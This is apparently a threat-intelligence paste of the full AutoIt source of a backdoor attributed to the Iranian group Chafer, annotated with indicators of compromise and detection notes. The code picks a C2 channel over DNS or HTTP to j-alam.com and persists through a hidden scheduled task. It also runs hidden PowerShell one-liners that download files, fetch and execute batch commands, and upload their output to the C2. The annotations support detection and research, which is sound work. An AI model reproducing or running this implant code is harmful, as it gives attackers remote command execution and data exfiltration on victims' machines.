vk_intel

3-22-2018: Iranian threat group #Chafer autoit

Mar 22nd, 2018
  1. #hash 332fab21cb0f2f50774fccf94fc7ae905a21b37fe66010dcef6b71c140bb7fa1
  2.  
  3. #include <GUIConstantsEx.au3>
  4. #include <WindowsConstants.au3>
  5. #include <SendMessage.au3>
  6. #include <Misc.au3>
  7. #include <MsgBoxConstants.au3>
  8. #include <Date.au3>
  9. #include <File.au3>
  10.  
  11.  
  ; Build directives: the compiled binary carries the VBSim.ico icon and shows no tray icon while running.
  12. #AutoIt3Wrapper_icon=VBSim.ico
  13. #NoTrayIcon
  ; COM errors are routed to MyErrFunc (below), whose body is entirely commented out, so any COM
  ; failure (e.g. in the WinHttpRequest calls) is swallowed silently rather than surfacing a dialog.
  14. $oMyError = ObjEvent("AutoIt.Error","MyErrFunc") ; Initialize a COM error handler
  15. ; This is my custom defined error handler
  16.  
  ; C2 domain used by every probe in this script (DNS A, DNS TXT and HTTP). Network IoC.
  17. Global $userver = "j-alam.com"
  18.  
  ; COM error handler registered via ObjEvent above. Every statement is commented out, so the
  ; function is a no-op: intercepted COM errors produce no output and do not stop the script.
  19. Func MyErrFunc()
  20. ;Msgbox(0,"AutoItCOM Test","We intercepted a COM Error !" & @CRLF & @CRLF & _
  21. ; "err.description is: " & @TAB & $oMyError.description & @CRLF & _
  22. ; "err.windescription:" & @TAB & $oMyError.windescription & @CRLF & _
  23. ; "err.number is: " & @TAB & hex($oMyError.number,8) & @CRLF & _
  24. ; "err.lastdllerror is: " & @TAB & $oMyError.lastdllerror & @CRLF & _
  25. ; "err.scriptline is: " & @TAB & $oMyError.scriptline & @CRLF & _
  26. ; "err.source is: " & @TAB & $oMyError.source & @CRLF & _
  27. ; "err.helpfile is: " & @TAB & $oMyError.helpfile & @CRLF & _
  28. ; "err.helpcontext is: " & @TAB & $oMyError.helpcontext _
  29. ; )
  30. EndFunc
  31.  
  ; user32.dll handle; it is only released in Terminate(), which sits after the unconditional Exit
  ; below the Switch and is therefore never reached.
  32. $dll = DllOpen("user32.dll")
  ; Initialise AutoIt's TCP layer, required before TCPNameToIP() in CheckDNSIP().
  33. TCPStartup()
  ; Exit hook (registered on the next line): tears down the TCP layer and terminates.
  34. Func On_Exit()
  35. TCPShutdown()
  36. Exit
  37. EndFunc
  ; Run On_Exit() whenever the script terminates, including the Exit after the Switch below.
  38. OnAutoItExitRegister("On_Exit")
  39.  
  ; Returns a string of $len characters, each drawn at random from A-Z, a-z or 0-9.
  ; Used only to randomise the DNS labels queried in CheckDNSIP() and CheckDNSTXT(), which
  ; makes each beacon lookup unique (detection: many one-off subdomains of the C2 domain).
  40. Func randomStr($len)
  41. $pwd = ""
  42. Local $aSpace[3]
  43. For $i = 1 To $len
  44. $aSpace[0] = Chr(Random(65, 90, 1)) ;A-Z
  45. $aSpace[1] = Chr(Random(97, 122, 1)) ;a-z
  46. $aSpace[2] = Chr(Random(48, 57, 1)) ;0-9
  47. $pwd &= $aSpace[Random(0, 2, 1)]
  48. Next
  49. return $pwd
  50. EndFunc
  51.  
  ; DNS A-record channel probe. Up to five lookups of "aa1<2 random chars>.<hostname>"; each
  ; resolved value is appended to Ex.log in the script directory. Returns True as soon as an
  ; answer starts with "65.", otherwise False after the fifth attempt.
  ; Detection: A-record queries for aa1??.j-alam.com, plus the Ex.log artifact on disk.
  52. Func CheckDNSIP($hostname)
  53. For $i = 5 To 1 Step -1
  54. Local $sIPAddress = TCPNameToIP("aa1"&randomStr(2)&"."&$hostname)
  55. _FileWriteLog(@ScriptDir & "\Ex.log", $sIPAddress)
  56. If @error Then
  57. ContinueLoop
  58. EndIf
  ; An answer in 65.0.0.0/8 is treated as the "channel available" signal.
  59. if StringLeft($sIPAddress, 3) = "65." Then
  60. Return True
  61. Else
  62. ContinueLoop
  63. EndIf
  64. Next
  65. Return False
  66. EndFunc ;==>Example
  ; DNS TXT channel probe. Up to five hidden "nslookup.exe -q=TXT g_??_??.<hostname>" child
  ; processes; stdout is read to EOF and logged to Ex.log. Returns True if the output contains
  ; at least one double-quoted string (i.e. a TXT record came back), else False.
  ; Detection: nslookup.exe spawned by an AutoIt process with a -q=TXT query to the C2 domain.
  67. Func CheckDNSTXT($hostname)
  68. For $i = 5 To 1 Step -1
  69. $foo = Run("nslookup.exe -q=TXT " & "g_" &randomStr(2) & "_" & randomStr(2) & "." & $hostname, "", @SW_HIDE, $STDERR_CHILD + $STDOUT_CHILD)
  70. Local $line = ""
  ; Drain the child's stdout; StdoutRead sets @error once the pipe is closed.
  71. While 1
  72. $line &= StdoutRead($foo)
  73. If @error Then ExitLoop
  74. Wend
  75. _FileWriteLog(@ScriptDir & "\Ex.log", "DNSTXT:" & $line)
  ; nslookup prints TXT data in double quotes; any match means a record was returned.
  76. Local $aArray = StringRegExp($line, '(\".*?\")', $STR_REGEXPARRAYMATCH )
  77.  
  78. if UBound($aArray) == 0 Then
  79. ContinueLoop
  80. EndIf
  81. Return True
  82. Next
  83. Return False
  84. EndFunc
  ; Synchronous HTTP GET via WinHttpRequest. Returns the response body, or 0 with @error set to
  ; 1 (Open failed), 2 (Send failed) or 3 (status other than 200).
  ; Not called anywhere in the visible script; CheckHttp() below is the variant actually used.
  85. Func HttpGet($sURL)
  86. Local $oHTTP = ObjCreate("WinHttp.WinHttpRequest.5.1")
  87.  
  88. $oHTTP.Open("GET", $sURL , False)
  89. If (@error) Then Return SetError(1, 0, 0)
  90.  
  91. $oHTTP.Send()
  92. If (@error) Then Return SetError(2, 0, 0)
  93.  
  94. If ($oHTTP.Status <> 200) Then Return SetError(3, 0, 0)
  95.  
  96. Return SetError(0, 0, $oHTTP.ResponseText)
  97. EndFunc
  ; HTTP channel probe: True only if a GET to $surl succeeds with status 200, False on any
  ; failure. AutoIt variable names are case-insensitive, so $sURL below is the $surl parameter.
  ; The User-Agent is WinHttpRequest's default (no custom headers are set).
  98. Func CheckHttp($surl)
  99. Local $oHTTP = ObjCreate("WinHttp.WinHttpRequest.5.1")
  100. $oHTTP.Open("GET", $sURL, False)
  101. If (@error) Then Return False
  102. $oHTTP.Send()
  103. If (@error) Then Return False
  104. If ($oHTTP.Status <> 200) Then Return False
  105. Return True
  106. EndFunc
  107.  
  ; Chooses the C2 channel: 0 = DNS A-record, 1 = DNS TXT, 2 = HTTP. The three probes run in
  ; order with no Else, so a later success overrides an earlier one - HTTP wins whenever
  ; http://<$userver>/update.php answers 200. Defaults to 0 if nothing responds.
  ; Every call generates traffic to the C2 domain on all three channels (detection opportunity).
  108. Func MethodFinder()
  109. Local $method = 0
  110.  
  111. if (CheckDNSIP($userver)) Then
  112. $method = 0
  113. EndIf
  114.  
  115. if (CheckDNSTXT($userver)) Then
  116. $method = 1
  117. EndIf
  118.  
  119. if (CheckHttp("http://"& $userver&"/update.php")) Then
  120. $method = 2
  121. EndIf
  122.  
  123. Return $method
  124. EndFunc
  125.  
  126. ;Local $te = MethodFinder()
  127.  
  128. ;_FileWriteLog(@ScriptDir & "\Ex.log", "MethodFinder:" & $te)
  129.  
  130.  
  ; Main flow starts here. Hidden DNS cache flush, presumably so the probes below perform fresh
  ; lookups rather than reuse cached answers.
  131. RunWait("ipconfig /flushdns", '', @SW_HIDE)
  ; Staging directory under the user profile (host IoC). "dn" receives downloads and "up" holds
  ; command output awaiting upload - see Case 2 below.
  132. Local $HOME = @UserProfileDir & "\appdata\local\microsoft\Taskbar\"
  ; Victim identifier sent in the "req=" parameter: first five characters of the computer name.
  133. Local $cname = @ComputerName
  134. $cname = StringLeft($cname, 5)
  135. ;========================= create essential directory======================
  136. if Not FileExists($HOME) Then
  137. DirCreate($Home)
  138. EndIf
  139. if Not FileExists($HOME&"dn") Then
  140. DirCreate($Home&"dn")
  141. EndIf
  142. if Not FileExists($HOME&"up") Then
  143. DirCreate($Home&"up")
  144. EndIf
  145. ;============================= read method from reg if not exist create registry value =============
  ; Rough seconds-since-1970 built from date macros (leap days counted from 1972). It is only ever
  ; compared as a difference against the stored UT value, so absolute accuracy is irrelevant.
  146. Local $epocTime = ((@YEAR - 1970) * 31557600) + (int ((@YEAR - 1972) / 4) * 86400) + ((@YDAY - 1) * 86400) + (@HOUR * 3600) + (@MIN * 60) + @SEC
  ; State lives in HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion as two REG_SZ values:
  ; UMe = chosen channel (0/1/2) and UT = time of the last MethodFinder() run. Both are created
  ; as "0" on first run. Registry IoC for detection and clean-up.
  147. Local $method = RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe")
  148. if @error Then
  149. RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe", "REG_SZ", "0")
  150. RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT", "REG_SZ", "0")
  151. $method = 0;
  152. EndIf
  ; Re-probe the C2 only when UT is missing or more than 400 seconds old, then persist the
  ; result. Between re-probes the stored channel is reused without any network activity here.
  153. Local $lastMethodFinderTime = RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT")
  154. if (@error or $epocTime - $lastMethodFinderTime > 400) Then
  155. $method = MethodFinder()
  156. _FileWriteLog(@ScriptDir & "\Ex.log", "newMethod:" & $method)
  157. RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe", "REG_SZ", $method)
  158. RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT", "REG_SZ", $epocTime)
  159. EndIf
  160. ;=============================== create task schedule ===================================
  ; Persistence. "schtasks" is split into "schta"&"sks", apparently to frustrate simple string
  ; matching. The task "SC Scheduled Scan" runs every 3 minutes (/sc minute /mo 3), /F replacing
  ; any existing task, and launches %userprofile%\appdata\local\microsoft\Taskbar\autoit3.exe
  ; with this script's full path. That autoit3.exe copy is not placed there by this script -
  ; presumably staged by the dropper; confirm from the delivery chain.
  ; Detection: schtasks.exe creation of a task pointing at an interpreter in a user-profile path.
  161. $txtStr = "schta"&"sks /create /F"&" /sc minute /mo 3 /tn ""SC Scheduled Scan"" /tr ""%userprofile%\appdata\local\microsoft\Taskbar\autoit3.exe '" & @ScriptFullPath & "'"""
  162. RunWait($txtStr, '', @SW_HIDE)
  ; Ex.log in the script's own directory collects progress lines from every stage (host artifact).
  163. _FileWriteLog(@ScriptDir & "\Ex.log", "Method:" & $method)
  164. ;============================ run powershell in assosation with $method ===============
  ; Dispatch on the chosen channel. Every child is launched hidden (@SW_HIDE) and, for the
  ; script cases, with "-nop -executionpolicy bypass"; PowerShell command-line and script-block
  ; logging are the primary detection points for all three branches.
  165. Switch $method
  166. Case 0
  ; Channel 0 (DNS A): runs dnip.ps1 from the staging directory. Neither dnip.ps1 nor dntx.ps1 is
  ; written anywhere in this script - presumably delivered separately; confirm.
  167. Local $exitcode = RunWait("powershell.exe -nop -executionpolicy bypass -File """ & $HOME & "dnip.ps1""" , '', @SW_HIDE)
  168. _FileWriteLog(@ScriptDir & "\Ex.log", "Powershell start 0:" & $method & "\t ExitCode:" & $exitcode)
  169. _FileWriteLog(@ScriptDir & "\Ex.log", "Home:" & $HOME)
  170. Case 1
  ; Channel 1 (DNS TXT): same pattern with dntx.ps1.
  171. Local $exitcode = RunWait("powershell.exe -nop -executionpolicy bypass -File """ & $HOME & "dntx.ps1""" , '', @SW_HIDE)
  172. _FileWriteLog(@ScriptDir & "\Ex.log", "Powershell start 1:" & $method & "\t ExitCode:" & $exitcode)
  173. _FileWriteLog(@ScriptDir & "\Ex.log", "Home:" & $HOME)
  174. Case 2
  ; Channel 2 (HTTP). The commented-out line preserves an earlier hard-coded C2 endpoint
  ; (107.191.62.45:7023) - keep it as a historical network IoC.
  175. ;Local $SERVER="http://107.191.62.45:7023/update.php?req=" & $cname
  ; Live URL assembled from fragments (another string-splitting pattern); it resolves to
  ; http://<$userver>/update.php?req=<first 5 chars of computer name>.
  176. Local $SERVER="ht"&"tp:"&"/"&"/"& $userver&"/upd" & "ate."& "ph"&"p?req"& "=" & $cname
  ; First PowerShell one-liner (file download): loop fetching "&m=d" into dn\<random>.-_ and
  ; rename each file to the name carried in the server's Content-Disposition header, until a
  ; download throws (catch -> break). The ".-_" suffix becomes ".dwn" via StringReplace below.
  177. $Dwn= "powershell "" " & _
  178. " &{$wc=(new-object System.Net.WebClient); " & _
  179. "while(1){try{$r=Get-Random ;$wc.DownloadFile('" _
  180. & $SERVER & _
  181. "&m=d','" & $HOME & "dn\'+$r+'.-_');" & _
  182. " Rename-Item -path ('" & _
  183. $HOME & _
  184. "dn\'+$r+'.-_') -newname " & _
  185. "($wc.ResponseHeaders['Content-Disposition'].Substring(" & _
  186. "$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9))}catch{break}}}"""
  187.  
  188. $Dwn = StringReplace($Dwn, "-_", "dwn")
  189.  
  190. RunWait($Dwn, '', @SW_HIDE)
  191.  
  192.  
  ; Second one-liner (task execution and result exfiltration): fetch "&m=b" into dn\<random>.bat,
  ; execute it through Invoke-Expression with stdout redirected to up\<random>bat, rename that
  ; output to <Content-Disposition filename>.txt, UploadFile every non-empty file in up\ to
  ; "&m=u" and delete it, then delete the downloaded .bat. Spaces in $HOME are backtick-escaped
  ; for PowerShell. The "-_" placeholder becomes "bat" via StringReplace below.
  ; Detection: WebClient download followed by Invoke-Expression of a path under
  ; ...\Taskbar\dn\, and outbound uploads to update.php?...&m=u.
  193. $DownloadExecute="powershell "" " & _
  194. "&{$r=Get-Random; "& _
  195. "$wc=(new-object System.Net.WebClient);" & _
  196. "$wc.DownloadFile('" & $SERVER & "&m=b','" & $HOME&"dn\'+$r+'.-_');" & _
  197. "Invoke-Expression ('"& StringReplace($HOME, " ", "` ")&"dn\'+$r+'.-_ >" & StringReplace($HOME, " ", "` ")&"up\'+$r+'-_');" & _
  198. "Rename-Item -path ('" & $HOME & _
  199. "up\'+$r+'-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring(" & _
  200. "$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9)+'.txt');" & _
  201. "Get-ChildItem " & StringReplace($HOME, " ", "` ") & "up\ | ForEach-Object "& _
  202. "{if((Get-Item($_.FullName)).length -gt 0){$wc.UploadFile('" & _
  203. $SERVER & _
  204. "&m=u',$_.FullName)};" & _
  205. "Remove-Item $_.FullName};Remove-Item ('"& $HOME & "dn\'+$r+'.-_')}"""
  206.  
  207. $DownloadExecute = StringReplace($DownloadExecute, "-_", "bat")
  208.  
  209. RunWait($DownloadExecute, '', @SW_HIDE)
  210. EndSwitch
  211.  
  ; Unconditional exit (triggers On_Exit via OnAutoItExitRegister). One cycle per scheduled-task
  ; run; everything after this line is never executed.
  212. Exit
  213.  
  214.  
  ; Dead code: follows the unconditional Exit above, so this borderless topmost 0x0 window is
  ; never created. Likely a remnant of an earlier build.
  215. $hGUI = GUICreate("X", 0, 0, -1, -1, BitOR($WS_POPUP, $WS_BORDER), $WS_EX_TOPMOST)
  216. GUISetBkColor(0xFFFFFF, $hGUI)
  217. GUISetState()
  218.  
  219.  
  ; Dead code (after the Exit above): neither ESC binding is ever registered, and the second
  ; would simply replace the first if it were.
  220. HotKeySet("{ESC}", "On_Exit")
  221.  
  222.  
  223. HotKeySet("{ESC}", "Terminate")
  ; Intended ESC handler: releases the user32.dll handle and exits with code 0. Never invoked,
  ; because the HotKeySet that references it sits after the unconditional Exit.
  224. Func Terminate()
  225. DllClose($dll)
  226. Exit 0
  227. EndFunc
  228.  
  ; Unreachable trailing exit (see the Exit above the GUI code).
  229. exit